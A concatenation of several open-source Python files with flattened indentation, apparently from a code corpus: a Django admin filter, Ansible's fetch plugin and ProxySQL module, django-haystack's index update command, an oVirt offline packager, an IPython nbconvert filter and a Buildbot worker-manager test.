# if a field is eligible to use the BooleanFieldListFilter, that'd be much
# more appropriate, and the AllValuesFieldListFilter won't get used for it.
class AllValuesFieldListFilter(FieldListFilter):
def __init__(self, field, request, params, model, model_admin, field_path):
self.lookup_kwarg = field_path
self.lookup_kwarg_isnull = '%s__isnull' % field_path
self.lookup_val = request.GET.get(self.lookup_kwarg, None)
self.lookup_val_isnull = request.GET.get(self.lookup_kwarg_isnull,
None)
parent_model, reverse_path = reverse_field_path(model, field_path)
queryset = parent_model._default_manager.all()
# optional feature: limit choices base on existing relationships
# queryset = queryset.complex_filter(
# {'%s__isnull' % reverse_path: False})
limit_choices_to = get_limit_choices_to_from_path(model, field_path)
queryset = queryset.filter(limit_choices_to)
self.lookup_choices = (queryset
.distinct()
.order_by(field.name)
.values_list(field.name, flat=True))
super(AllValuesFieldListFilter, self).__init__(
field, request, params, model, model_admin, field_path)
def expected_parameters(self):
return [self.lookup_kwarg, self.lookup_kwarg_isnull]
def choices(self, cl):
from django.contrib.admin.views.main import EMPTY_CHANGELIST_VALUE
yield {
'selected': (self.lookup_val is None
and self.lookup_val_isnull is None),
'query_string': cl.get_query_string({},
[self.lookup_kwarg, self.lookup_kwarg_isnull]),
'display': _('All'),
}
include_none = False
for val in self.lookup_choices:
if val is None:
include_none = True
continue
val = smart_text(val)
yield {
'selected': self.lookup_val == val,
'query_string': cl.get_query_string({
self.lookup_kwarg: val,
}, [self.lookup_kwarg_isnull]),
'display': val,
}
if include_none:
yield {
'selected': bool(self.lookup_val_isnull),
'query_string': cl.get_query_string({
self.lookup_kwarg_isnull: 'True',
}, [self.lookup_kwarg]),
'display': EMPTY_CHANGELIST_VALUE,
}
FieldListFilter.register(lambda f: True, AllValuesFieldListFilter)
| mit |
bwbeach/ansible | lib/ansible/plugins/action/fetch.py | 18 | 7436 | # (c) 2012-2014, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import pwd
import random
import traceback
import tempfile
import base64
from ansible import constants as C
from ansible.errors import *
from ansible.plugins.action import ActionBase
from ansible.utils.boolean import boolean
from ansible.utils.hashing import checksum, checksum_s, md5, secure_hash
from ansible.utils.path import makedirs_safe
class ActionModule(ActionBase):
def run(self, tmp=None, task_vars=dict()):
''' handler for fetch operations '''
if self._play_context.check_mode:
return dict(skipped=True, msg='check mode not (yet) supported for this module')
source = self._task.args.get('src', None)
dest = self._task.args.get('dest', None)
flat = boolean(self._task.args.get('flat'))
fail_on_missing = boolean(self._task.args.get('fail_on_missing'))
validate_checksum = boolean(self._task.args.get('validate_checksum', self._task.args.get('validate_md5')))
if 'validate_md5' in self._task.args and 'validate_checksum' in self._task.args:
return dict(failed=True, msg="validate_checksum and validate_md5 cannot both be specified")
if source is None or dest is None:
return dict(failed=True, msg="src and dest are required")
source = self._connection._shell.join_path(source)
source = self._remote_expand_user(source, tmp)
# calculate checksum for the remote file
remote_checksum = self._remote_checksum(tmp, source, all_vars=task_vars)
# use slurp if sudo and permissions are lacking
remote_data = None
if remote_checksum in ('1', '2') or self._play_context.become:
slurpres = self._execute_module(module_name='slurp', module_args=dict(src=source), task_vars=task_vars, tmp=tmp)
if slurpres.get('rc') == 0:
if slurpres['encoding'] == 'base64':
remote_data = base64.b64decode(slurpres['content'])
if remote_data is not None:
remote_checksum = checksum_s(remote_data)
# the source path may have been expanded on the
# target system, so we compare it here and use the
# expanded version if it's different
remote_source = slurpres.get('source')
if remote_source and remote_source != source:
source = remote_source
else:
# FIXME: should raise an error here? the old code did nothing
pass
# calculate the destination name
if os.path.sep not in self._connection._shell.join_path('a', ''):
source = self._connection._shell._unquote(source)
source_local = source.replace('\\', '/')
else:
source_local = source
dest = os.path.expanduser(dest)
if flat:
if dest.endswith(os.sep):
# if the path ends with "/", we'll use the source filename as the
# destination filename
base = os.path.basename(source_local)
dest = os.path.join(dest, base)
if not dest.startswith("/"):
# if dest does not start with "/", we'll assume a relative path
dest = self._loader.path_dwim(dest)
else:
# files are saved in dest dir, with a subdir for each host, then the filename
if 'inventory_hostname' in task_vars:
target_name = task_vars['inventory_hostname']
else:
target_name = self._play_context.remote_addr
dest = "%s/%s/%s" % (self._loader.path_dwim(dest), target_name, source_local)
dest = dest.replace("//","/")
if remote_checksum in ('0', '1', '2', '3', '4'):
# these don't fail because you may want to transfer a log file that possibly MAY exist
# but keep going to fetch other log files
if remote_checksum == '0':
result = dict(msg="unable to calculate the checksum of the remote file", file=source, changed=False)
elif remote_checksum == '1':
if fail_on_missing:
result = dict(failed=True, msg="the remote file does not exist", file=source)
else:
result = dict(msg="the remote file does not exist, not transferring, ignored", file=source, changed=False)
elif remote_checksum == '2':
result = dict(msg="no read permission on remote file, not transferring, ignored", file=source, changed=False)
elif remote_checksum == '3':
result = dict(msg="remote file is a directory, fetch cannot work on directories", file=source, changed=False)
elif remote_checksum == '4':
result = dict(msg="python isn't present on the system. Unable to compute checksum", file=source, changed=False)
return result
# calculate checksum for the local file
local_checksum = checksum(dest)
if remote_checksum != local_checksum:
# create the containing directories, if needed
makedirs_safe(os.path.dirname(dest))
# fetch the file and check for changes
if remote_data is None:
self._connection.fetch_file(source, dest)
else:
try:
f = open(dest, 'w')
f.write(remote_data)
f.close()
except (IOError, OSError) as e:
raise AnsibleError("Failed to fetch the file: %s" % e)
new_checksum = secure_hash(dest)
# For backwards compatibility. We'll return None on FIPS enabled
# systems
try:
new_md5 = md5(dest)
except ValueError:
new_md5 = None
if validate_checksum and new_checksum != remote_checksum:
return dict(failed=True, md5sum=new_md5, msg="checksum mismatch", file=source, dest=dest, remote_md5sum=None, checksum=new_checksum, remote_checksum=remote_checksum)
return dict(changed=True, md5sum=new_md5, dest=dest, remote_md5sum=None, checksum=new_checksum, remote_checksum=remote_checksum)
else:
# For backwards compatibility. We'll return None on FIPS enabled
# systems
try:
local_md5 = md5(dest)
except ValueError:
local_md5 = None
return dict(changed=False, md5sum=local_md5, file=source, dest=dest, checksum=local_checksum)
| gpl-3.0 |
axinging/sky_engine | build/android/pylib/remote/device/appurify_constants.py | 36 | 1614 | # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Defines a set of constants specific to appurify."""
# Appurify network config constants.
class NETWORK(object):
WIFI_1_BAR = 1
SPRINT_4G_LTE_4_BARS = 2
SPRINT_3G_5_BARS = 3
SPRINT_3G_4_BARS = 4
SPRINT_3G_3_BARS = 5
SPRINT_3G_2_BARS = 6
SPRINT_3G_1_BAR = 7
SPRING_4G_1_BAR = 8
VERIZON_3G_5_BARS = 9
VERIZON_3G_4_BARS = 10
VERIZON_3G_3_BARS = 11
VERIZON_3G_2_BARS = 12
VERIZON_3G_1_BAR = 13
VERIZON_4G_1_BAR = 14
ATANDT_3G_5_BARS = 15
ATANDT_3G_4_BARS = 16
ATANDT_3G_3_BARS = 17
ATANDT_3G_2_BARS = 18
ATANDT_3G_1_BAR = 19
GENERIC_2G_4_BARS = 20
GENERIC_2G_3_BARS = 21
GENERIC_EVOLVED_EDGE = 22
GENERIC_GPRS = 23
GENERIC_ENHANCED_GPRS = 24
GENERIC_LTE = 25
GENERIC_HIGH_LATENCY_DNS = 26
GENERIC_100_PERCENT_PACKET_LOSS = 27
ATANDT_HSPA_PLUS = 28
ATANDT_4G_LTE_4_BARS = 29
VERIZON_4G_LTE_4_BARS = 30
GENERIC_DIGITAL_SUBSCRIBE_LINE = 31
WIFI_STARBUCKS_3_BARS = 32
WIFI_STARBUCKS_4_BARS = 33
WIFI_STARBUCKS_HIGH_TRAFFIC = 34
WIFI_TARGET_1_BAR = 35
WIFI_TARGET_3_BARS = 36
WIFI_TARGET_4_BARS = 37
PUBLIC_WIFI_MCDONALDS_5_BARS = 38
PUBLIC_WIFI_MCDONALDS_4_BARS = 39
PUBLIC_WIFI_MCDONALDS_2_BARS = 40
PUBLIC_WIFI_MCDONALDS_1_BAR = 41
PUBLIC_WIFI_KOHLS_5_BARS = 42
PUBLIC_WIFI_KOHLS_4_BARS = 43
PUBLIC_WIFI_KOHLS_2_BARS = 44
PUBLIC_WIFI_ATANDT_5_BARS = 45
PUBLIC_WIFI_ATANDT_4_BARS = 46
PUBLIC_WIFI_ATANDT_2_BARS = 47
PUBLIC_WIFI_ATANDT_1_BAR = 48
BOINGO = 49 | bsd-3-clause |
t794104/ansible | lib/ansible/modules/database/proxysql/proxysql_replication_hostgroups.py | 52 | 13353 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = '''
---
module: proxysql_replication_hostgroups
version_added: "2.3"
author: "Ben Mildren (@bmildren)"
short_description: Manages replication hostgroups using the proxysql admin
interface.
description:
- Each row in mysql_replication_hostgroups represent a pair of
writer_hostgroup and reader_hostgroup. ProxySQL will monitor the value of
read_only for all the servers in specified hostgroups, and based on the
value of read_only will assign the server to the writer or reader
hostgroups.
options:
writer_hostgroup:
description:
- Id of the writer hostgroup.
required: True
reader_hostgroup:
description:
- Id of the reader hostgroup.
required: True
comment:
description:
- Text field that can be used for any purposed defined by the user.
state:
description:
- When C(present) - adds the replication hostgroup, when C(absent) -
removes the replication hostgroup.
choices: [ "present", "absent" ]
default: present
extends_documentation_fragment:
- proxysql.managing_config
- proxysql.connectivity
'''
EXAMPLES = '''
---
# This example adds a replication hostgroup, it saves the mysql server config
# to disk, but avoids loading the mysql server config to runtime (this might be
# because several replication hostgroup are being added and the user wants to
# push the config to runtime in a single batch using the
# M(proxysql_manage_config) module). It uses supplied credentials to connect
# to the proxysql admin interface.
- proxysql_replication_hostgroups:
login_user: 'admin'
login_password: 'admin'
writer_hostgroup: 1
reader_hostgroup: 2
state: present
load_to_runtime: False
# This example removes a replication hostgroup, saves the mysql server config
# to disk, and dynamically loads the mysql server config to runtime. It uses
# credentials in a supplied config file to connect to the proxysql admin
# interface.
- proxysql_replication_hostgroups:
config_file: '~/proxysql.cnf'
writer_hostgroup: 3
reader_hostgroup: 4
state: absent
'''
RETURN = '''
stdout:
description: The replication hostgroup modified or removed from proxysql
returned: On create/update will return the newly modified group, on delete
it will return the deleted record.
type: dict
"sample": {
"changed": true,
"msg": "Added server to mysql_hosts",
"repl_group": {
"comment": "",
"reader_hostgroup": "1",
"writer_hostgroup": "2"
},
"state": "present"
}
'''
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.mysql import mysql_connect, mysql_driver, mysql_driver_fail_msg
from ansible.module_utils._text import to_native
# ===========================================
# proxysql module specific support methods.
#
def perform_checks(module):
if module.params["login_port"] < 0 \
or module.params["login_port"] > 65535:
module.fail_json(
msg="login_port must be a valid unix port number (0-65535)"
)
if not module.params["writer_hostgroup"] >= 0:
module.fail_json(
msg="writer_hostgroup must be a integer greater than or equal to 0"
)
if not module.params["reader_hostgroup"] == \
module.params["writer_hostgroup"]:
if not module.params["reader_hostgroup"] > 0:
module.fail_json(
msg=("writer_hostgroup must be a integer greater than" +
" or equal to 0")
)
else:
module.fail_json(
msg="reader_hostgroup cannot equal writer_hostgroup"
)
if mysql_driver is None:
module.fail_json(msg=mysql_driver_fail_msg)
def save_config_to_disk(cursor):
cursor.execute("SAVE MYSQL SERVERS TO DISK")
return True
def load_config_to_runtime(cursor):
cursor.execute("LOAD MYSQL SERVERS TO RUNTIME")
return True
class ProxySQLReplicationHostgroup(object):
def __init__(self, module):
self.state = module.params["state"]
self.save_to_disk = module.params["save_to_disk"]
self.load_to_runtime = module.params["load_to_runtime"]
self.writer_hostgroup = module.params["writer_hostgroup"]
self.reader_hostgroup = module.params["reader_hostgroup"]
self.comment = module.params["comment"]
def check_repl_group_config(self, cursor, keys):
query_string = \
"""SELECT count(*) AS `repl_groups`
FROM mysql_replication_hostgroups
WHERE writer_hostgroup = %s
AND reader_hostgroup = %s"""
query_data = \
[self.writer_hostgroup,
self.reader_hostgroup]
if self.comment and not keys:
query_string += "\n AND comment = %s"
query_data.append(self.comment)
cursor.execute(query_string, query_data)
check_count = cursor.fetchone()
return (int(check_count['repl_groups']) > 0)
def get_repl_group_config(self, cursor):
query_string = \
"""SELECT *
FROM mysql_replication_hostgroups
WHERE writer_hostgroup = %s
AND reader_hostgroup = %s"""
query_data = \
[self.writer_hostgroup,
self.reader_hostgroup]
cursor.execute(query_string, query_data)
repl_group = cursor.fetchone()
return repl_group
def create_repl_group_config(self, cursor):
query_string = \
"""INSERT INTO mysql_replication_hostgroups (
writer_hostgroup,
reader_hostgroup,
comment)
VALUES (%s, %s, %s)"""
query_data = \
[self.writer_hostgroup,
self.reader_hostgroup,
self.comment or '']
cursor.execute(query_string, query_data)
return True
def update_repl_group_config(self, cursor):
query_string = \
"""UPDATE mysql_replication_hostgroups
SET comment = %s
WHERE writer_hostgroup = %s
AND reader_hostgroup = %s"""
query_data = \
[self.comment,
self.writer_hostgroup,
self.reader_hostgroup]
cursor.execute(query_string, query_data)
return True
def delete_repl_group_config(self, cursor):
query_string = \
"""DELETE FROM mysql_replication_hostgroups
WHERE writer_hostgroup = %s
AND reader_hostgroup = %s"""
query_data = \
[self.writer_hostgroup,
self.reader_hostgroup]
cursor.execute(query_string, query_data)
return True
def manage_config(self, cursor, state):
if state:
if self.save_to_disk:
save_config_to_disk(cursor)
if self.load_to_runtime:
load_config_to_runtime(cursor)
def create_repl_group(self, check_mode, result, cursor):
if not check_mode:
result['changed'] = \
self.create_repl_group_config(cursor)
result['msg'] = "Added server to mysql_hosts"
result['repl_group'] = \
self.get_repl_group_config(cursor)
self.manage_config(cursor,
result['changed'])
else:
result['changed'] = True
result['msg'] = ("Repl group would have been added to" +
" mysql_replication_hostgroups, however" +
" check_mode is enabled.")
def update_repl_group(self, check_mode, result, cursor):
if not check_mode:
result['changed'] = \
self.update_repl_group_config(cursor)
result['msg'] = "Updated server in mysql_hosts"
result['repl_group'] = \
self.get_repl_group_config(cursor)
self.manage_config(cursor,
result['changed'])
else:
result['changed'] = True
result['msg'] = ("Repl group would have been updated in" +
" mysql_replication_hostgroups, however" +
" check_mode is enabled.")
def delete_repl_group(self, check_mode, result, cursor):
if not check_mode:
result['repl_group'] = \
self.get_repl_group_config(cursor)
result['changed'] = \
self.delete_repl_group_config(cursor)
result['msg'] = "Deleted server from mysql_hosts"
self.manage_config(cursor,
result['changed'])
else:
result['changed'] = True
result['msg'] = ("Repl group would have been deleted from" +
" mysql_replication_hostgroups, however" +
" check_mode is enabled.")
# ===========================================
# Module execution.
#
def main():
module = AnsibleModule(
argument_spec=dict(
login_user=dict(default=None, type='str'),
login_password=dict(default=None, no_log=True, type='str'),
login_host=dict(default="127.0.0.1"),
login_unix_socket=dict(default=None),
login_port=dict(default=6032, type='int'),
config_file=dict(default="", type='path'),
writer_hostgroup=dict(required=True, type='int'),
reader_hostgroup=dict(required=True, type='int'),
comment=dict(type='str'),
state=dict(default='present', choices=['present',
'absent']),
save_to_disk=dict(default=True, type='bool'),
load_to_runtime=dict(default=True, type='bool')
),
supports_check_mode=True
)
perform_checks(module)
login_user = module.params["login_user"]
login_password = module.params["login_password"]
config_file = module.params["config_file"]
cursor = None
try:
cursor = mysql_connect(module,
login_user,
login_password,
config_file,
cursor_class=mysql_driver.cursors.DictCursor)
except mysql_driver.Error as e:
module.fail_json(
msg="unable to connect to ProxySQL Admin Module.. %s" % to_native(e)
)
proxysql_repl_group = ProxySQLReplicationHostgroup(module)
result = {}
result['state'] = proxysql_repl_group.state
if proxysql_repl_group.state == "present":
try:
if not proxysql_repl_group.check_repl_group_config(cursor,
keys=True):
proxysql_repl_group.create_repl_group(module.check_mode,
result,
cursor)
else:
if not proxysql_repl_group.check_repl_group_config(cursor,
keys=False):
proxysql_repl_group.update_repl_group(module.check_mode,
result,
cursor)
else:
result['changed'] = False
result['msg'] = ("The repl group already exists in" +
" mysql_replication_hostgroups and" +
" doesn't need to be updated.")
result['repl_group'] = \
proxysql_repl_group.get_repl_group_config(cursor)
except mysql_driver.Error as e:
module.fail_json(
msg="unable to modify replication hostgroup.. %s" % to_native(e)
)
elif proxysql_repl_group.state == "absent":
try:
if proxysql_repl_group.check_repl_group_config(cursor,
keys=True):
proxysql_repl_group.delete_repl_group(module.check_mode,
result,
cursor)
else:
result['changed'] = False
result['msg'] = ("The repl group is already absent from the" +
" mysql_replication_hostgroups memory" +
" configuration")
except mysql_driver.Error as e:
module.fail_json(
msg="unable to delete replication hostgroup.. %s" % to_native(e)
)
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
jannon/django-haystack | haystack/management/commands/update_index.py | 11 | 11888 | # encoding: utf-8
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import os
import sys
import warnings
from datetime import timedelta
from optparse import make_option
try:
from django.db import close_old_connections
except ImportError:
# This can be removed when we drop support for Django 1.7 and earlier:
from django.db import close_connection as close_old_connections
from django.core.management.base import LabelCommand
from django.db import reset_queries
from haystack import connections as haystack_connections
from haystack.query import SearchQuerySet
from haystack.utils.app_loading import haystack_get_models, haystack_load_apps
try:
from django.utils.encoding import force_text
except ImportError:
from django.utils.encoding import force_unicode as force_text
try:
from django.utils.encoding import smart_bytes
except ImportError:
from django.utils.encoding import smart_str as smart_bytes
try:
from django.utils.timezone import now
except ImportError:
from datetime import datetime
now = datetime.now
DEFAULT_BATCH_SIZE = None
DEFAULT_AGE = None
APP = 'app'
MODEL = 'model'
def worker(bits):
# We need to reset the connections, otherwise the different processes
# will try to share the connection, which causes things to blow up.
from django.db import connections
for alias, info in connections.databases.items():
# We need to also tread lightly with SQLite, because blindly wiping
# out connections (via ``... = {}``) destroys in-memory DBs.
if 'sqlite3' not in info['ENGINE']:
try:
close_old_connections()
if isinstance(connections._connections, dict):
del(connections._connections[alias])
else:
delattr(connections._connections, alias)
except KeyError:
pass
if bits[0] == 'do_update':
func, model, start, end, total, using, start_date, end_date, verbosity, commit = bits
elif bits[0] == 'do_remove':
func, model, pks_seen, start, upper_bound, using, verbosity, commit = bits
else:
return
unified_index = haystack_connections[using].get_unified_index()
index = unified_index.get_index(model)
backend = haystack_connections[using].get_backend()
if func == 'do_update':
qs = index.build_queryset(start_date=start_date, end_date=end_date)
do_update(backend, index, qs, start, end, total, verbosity=verbosity, commit=commit)
else:
raise NotImplementedError('Unknown function %s' % func)
def do_update(backend, index, qs, start, end, total, verbosity=1, commit=True):
# Get a clone of the QuerySet so that the cache doesn't bloat up
# in memory. Useful when reindexing large amounts of data.
small_cache_qs = qs.all()
current_qs = small_cache_qs[start:end]
if verbosity >= 2:
if hasattr(os, 'getppid') and os.getpid() == os.getppid():
print(" indexed %s - %d of %d." % (start + 1, end, total))
else:
print(" indexed %s - %d of %d (by %s)." % (start + 1, end, total, os.getpid()))
# FIXME: Get the right backend.
backend.update(index, current_qs, commit=commit)
# Clear out the DB connections queries because it bloats up RAM.
reset_queries()
class Command(LabelCommand):
help = "Freshens the index for the given app(s)."
base_options = (
make_option('-a', '--age', action='store', dest='age',
default=DEFAULT_AGE, type='int',
help='Number of hours back to consider objects new.'
),
make_option('-s', '--start', action='store', dest='start_date',
default=None, type='string',
help='The start date for indexing within. Can be any dateutil-parsable string, recommended to be YYYY-MM-DDTHH:MM:SS.'
),
make_option('-e', '--end', action='store', dest='end_date',
default=None, type='string',
help='The end date for indexing within. Can be any dateutil-parsable string, recommended to be YYYY-MM-DDTHH:MM:SS.'
),
make_option('-b', '--batch-size', action='store', dest='batchsize',
default=None, type='int',
help='Number of items to index at once.'
),
make_option('-r', '--remove', action='store_true', dest='remove',
default=False, help='Remove objects from the index that are no longer present in the database.'
),
make_option("-u", "--using", action="append", dest="using",
default=[],
help='Update only the named backend (can be used multiple times). '
'By default all backends will be updated.'
),
make_option('-k', '--workers', action='store', dest='workers',
default=0, type='int',
help='Allows for the use multiple workers to parallelize indexing. Requires multiprocessing.'
),
make_option('--nocommit', action='store_false', dest='commit',
default=True, help='Will pass commit=False to the backend.'
),
)
option_list = LabelCommand.option_list + base_options
def handle(self, *items, **options):
self.verbosity = int(options.get('verbosity', 1))
self.batchsize = options.get('batchsize', DEFAULT_BATCH_SIZE)
self.start_date = None
self.end_date = None
self.remove = options.get('remove', False)
self.workers = int(options.get('workers', 0))
self.commit = options.get('commit', True)
if sys.version_info < (2, 7):
warnings.warn('multiprocessing is disabled on Python 2.6 and earlier. '
'See https://github.com/toastdriven/django-haystack/issues/1001')
self.workers = 0
self.backends = options.get('using')
if not self.backends:
self.backends = haystack_connections.connections_info.keys()
age = options.get('age', DEFAULT_AGE)
start_date = options.get('start_date')
end_date = options.get('end_date')
if age is not None:
self.start_date = now() - timedelta(hours=int(age))
if start_date is not None:
from dateutil.parser import parse as dateutil_parse
try:
self.start_date = dateutil_parse(start_date)
except ValueError:
pass
if end_date is not None:
from dateutil.parser import parse as dateutil_parse
try:
self.end_date = dateutil_parse(end_date)
except ValueError:
pass
if not items:
items = haystack_load_apps()
return super(Command, self).handle(*items, **options)
def handle_label(self, label, **options):
for using in self.backends:
try:
self.update_backend(label, using)
except:
logging.exception("Error updating %s using %s ", label, using)
raise
def update_backend(self, label, using):
from haystack.exceptions import NotHandled
backend = haystack_connections[using].get_backend()
unified_index = haystack_connections[using].get_unified_index()
if self.workers > 0:
import multiprocessing
for model in haystack_get_models(label):
try:
index = unified_index.get_index(model)
except NotHandled:
if self.verbosity >= 2:
print("Skipping '%s' - no index." % model)
continue
if self.workers > 0:
# workers resetting connections leads to references to models / connections getting
# stale and having their connection disconnected from under them. Resetting before
# the loop continues and it accesses the ORM makes it better.
close_old_connections()
qs = index.build_queryset(using=using, start_date=self.start_date,
end_date=self.end_date)
total = qs.count()
if self.verbosity >= 1:
print(u"Indexing %d %s" % (total, force_text(model._meta.verbose_name_plural)))
batch_size = self.batchsize or backend.batch_size
if self.workers > 0:
ghetto_queue = []
for start in range(0, total, batch_size):
end = min(start + batch_size, total)
if self.workers == 0:
do_update(backend, index, qs, start, end, total, verbosity=self.verbosity, commit=self.commit)
else:
ghetto_queue.append(('do_update', model, start, end, total, using, self.start_date, self.end_date, self.verbosity, self.commit))
if self.workers > 0:
pool = multiprocessing.Pool(self.workers)
pool.map(worker, ghetto_queue)
pool.close()
pool.join()
if self.remove:
if self.start_date or self.end_date or total <= 0:
# They're using a reduced set, which may not incorporate
# all pks. Rebuild the list with everything.
qs = index.index_queryset().values_list('pk', flat=True)
database_pks = set(smart_bytes(pk) for pk in qs)
total = len(database_pks)
else:
database_pks = set(smart_bytes(pk) for pk in qs.values_list('pk', flat=True))
# Since records may still be in the search index but not the local database
# we'll use that to create batches for processing.
# See https://github.com/django-haystack/django-haystack/issues/1186
index_total = SearchQuerySet(using=backend.connection_alias).models(model).count()
# Retrieve PKs from the index. Note that this cannot be a numeric range query because although
# pks are normally numeric they can be non-numeric UUIDs or other custom values. To reduce
# load on the search engine, we only retrieve the pk field, which will be checked against the
# full list obtained from the database, and the id field, which will be used to delete the
# record should it be found to be stale.
index_pks = SearchQuerySet(using=backend.connection_alias).models(model)
index_pks = index_pks.values_list('pk', 'id')
# We'll collect all of the record IDs which are no longer present in the database and delete
# them after walking the entire index. This uses more memory than the incremental approach but
# avoids needing the pagination logic below to account for both commit modes:
stale_records = set()
for start in range(0, index_total, batch_size):
upper_bound = start + batch_size
# If the database pk is no longer present, queue the index key for removal:
for pk, rec_id in index_pks[start:upper_bound]:
if smart_bytes(pk) not in database_pks:
stale_records.add(rec_id)
if stale_records:
if self.verbosity >= 1:
print(" removing %d stale records." % len(stale_records))
for rec_id in stale_records:
# Since the PK was not in the database list, we'll delete the record from the search index:
if self.verbosity >= 2:
print(" removing %s." % rec_id)
backend.remove(rec_id, commit=self.commit)
| bsd-3-clause |
jtux270/translate | ovirt/packaging/setup/plugins/ovirt-engine-common/base/core/offlinepackager.py | 3 | 2433 | #
# ovirt-engine-setup -- ovirt engine setup
# Copyright (C) 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Fake packager for offline mode"""
import platform
import gettext
_ = lambda m: gettext.dgettext(message=m, domain='ovirt-engine-setup')
from otopi import constants as otopicons
from otopi import packager
from otopi import util
from otopi import plugin
from ovirt_engine_setup import constants as osetupcons
@util.export
class Plugin(plugin.PluginBase, packager.PackagerBase):
"""Offline packager."""
def install(self, packages, ignoreErrors=False):
pass
def update(self, packages, ignoreErrors=False):
pass
def queryPackages(self, patterns=None):
if patterns == ['vdsm']:
return [
{
'operation': 'installed',
'display_name': 'vdsm',
'name': 'vdsm',
'version': '999.9.9',
'release': '1',
'epoch': '0',
'arch': 'noarch',
},
]
else:
return []
def __init__(self, context):
super(Plugin, self).__init__(context=context)
self._distribution = platform.linux_distribution(
full_distribution_name=0
)[0]
@plugin.event(
stage=plugin.Stages.STAGE_INIT,
after=(
otopicons.Stages.PACKAGERS_DETECTION,
),
)
def _init(self):
if self.environment.setdefault(
osetupcons.CoreEnv.OFFLINE_PACKAGER,
(
self.environment[osetupcons.CoreEnv.DEVELOPER_MODE] or
self._distribution not in ('redhat', 'fedora', 'centos')
),
):
self.logger.debug('Registering offline packager')
self.context.registerPackager(packager=self)
# vim: expandtab tabstop=4 shiftwidth=4
| gpl-3.0 |
mattvonrocketstein/smash | smashlib/ipy3x/nbconvert/filters/datatypefilter.py | 1 | 1220 | """Filter used to select the first preferred output format available.
The filter contained in the file allows the converter templates to select
the output format that is most valuable to the active export format. The
value of the different formats is set via
NbConvertBase.display_data_priority
"""
#-----------------------------------------------------------------------------
# Copyright (c) 2013, the IPython Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Classes and functions
#-----------------------------------------------------------------------------
from ..utils.base import NbConvertBase
__all__ = ['DataTypeFilter']
class DataTypeFilter(NbConvertBase):
""" Returns the preferred display format """
def __call__(self, output):
""" Return the first available format in the priority """
for fmt in self.display_data_priority:
if fmt in output:
return [fmt]
return []
| mit |
sbidoul/buildbot | master/buildbot/test/unit/test_worker_manager.py | 10 | 4219 | # This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
from __future__ import absolute_import
from __future__ import print_function
import mock
from twisted.internet import defer
from twisted.trial import unittest
from zope.interface import implementer
from buildbot import interfaces
from buildbot.process import botmaster
from buildbot.test.fake import fakemaster
from buildbot.util import service
from buildbot.worker import manager as workermanager
@implementer(interfaces.IWorker)
class FakeWorker(service.BuildbotService):
reconfig_count = 0
def __init__(self, workername):
service.BuildbotService.__init__(self, name=workername)
def reconfigService(self):
self.reconfig_count += 1
self.configured = True
return defer.succeed(None)
class FakeWorker2(FakeWorker):
pass
class TestWorkerManager(unittest.TestCase):
def setUp(self):
self.master = fakemaster.make_master(testcase=self,
wantMq=True, wantData=True)
self.master.mq = self.master.mq
self.workers = workermanager.WorkerManager(self.master)
self.workers.setServiceParent(self.master)
# workers expect a botmaster as well as a manager.
self.master.botmaster.disownServiceParent()
self.botmaster = botmaster.BotMaster()
self.master.botmaster = self.botmaster
self.master.botmaster.setServiceParent(self.master)
self.new_config = mock.Mock()
self.workers.startService()
def tearDown(self):
return self.workers.stopService()
@defer.inlineCallbacks
def test_reconfigServiceWorkers_add_remove(self):
worker = FakeWorker('worker1')
self.new_config.workers = [worker]
yield self.workers.reconfigServiceWithBuildbotConfig(self.new_config)
self.assertIdentical(worker.parent, self.workers)
self.assertEqual(self.workers.workers, {'worker1': worker})
self.new_config.workers = []
self.assertEqual(worker.running, True)
yield self.workers.reconfigServiceWithBuildbotConfig(self.new_config)
self.assertEqual(worker.running, False)
@defer.inlineCallbacks
def test_reconfigServiceWorkers_reconfig(self):
worker = FakeWorker('worker1')
worker.setServiceParent(self.workers)
worker.parent = self.master
worker.manager = self.workers
worker.botmaster = self.master.botmaster
worker_new = FakeWorker('worker1')
self.new_config.workers = [worker_new]
yield self.workers.reconfigServiceWithBuildbotConfig(self.new_config)
# worker was not replaced..
self.assertIdentical(self.workers.workers['worker1'], worker)
@defer.inlineCallbacks
def test_reconfigServiceWorkers_class_changes(self):
worker = FakeWorker('worker1')
worker.setServiceParent(self.workers)
worker_new = FakeWorker2('worker1')
self.new_config.workers = [worker_new]
yield self.workers.reconfigServiceWithBuildbotConfig(self.new_config)
